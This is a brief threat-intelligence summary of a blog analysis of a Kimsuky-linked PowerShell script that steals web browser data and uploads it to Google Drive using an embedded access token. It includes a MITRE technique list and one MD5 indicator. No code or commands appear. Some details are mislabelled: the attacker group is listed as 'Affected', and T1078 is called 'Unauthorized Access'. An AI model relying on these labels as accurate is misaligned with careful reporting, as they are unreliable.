The article discusses the theft of web browser information through the use of malware, particularly focusing on a PowerShell script associated with the Kimsuky threat group. The analysis highlights the use of obfuscation techniques that make the malware complex and challenging to analyze, especially in the context of advancing AI capabilities. The findings indicate a substantial threat posed by Kimsuky’s continuous updates to their malware and ongoing spear phishing campaigns. Affected: Kimsuky threat group, economic sector
Keypoints :
- The malware discussed is a PowerShell script used for the theft of web browser information.
- The technique of obfuscation employed in the malware makes it difficult to analyze.
- A specific PowerShell script linked to Kimsuky was chosen for detailed analysis.
- The code performs several operations including executing and uploading PowerShell scripts.
- It interacts with Google Drive and uses an access token embedded within the script.
- The Kimsuky threat group is known for spear phishing attacks and for continuously updating their malware.
- The economic implications of Kimsuky’s campaigns pose significant threats.
MITRE Techniques :
- PowerShell (T1086) – The malware uses PowerShell scripts to execute code, which includes defining functions for processing and executing Base64 encoded strings.
- Obfuscated Files or Information (T1027) – The script employs obfuscation techniques that obscure its operations, complicating analysis and detection.
- Data from Information Repositories (T1213) – The malware interacts with Google Drive to manage uploaded information.
- Unauthorized Access (T1078) – The use of access tokens within the script indicates unauthorized access to cloud services.
Indicator of Compromise :
- [MD5] 1e9d94d88fdac3c4a0a47a3a1d07e329
Full Story: https://malwareanalysisspace.blogspot.com/2025/02/the-north-korean-nation-state-apt43.html
Views: 49
简体中文
Nederlands
Français
Bahasa Indonesia
日本語
Português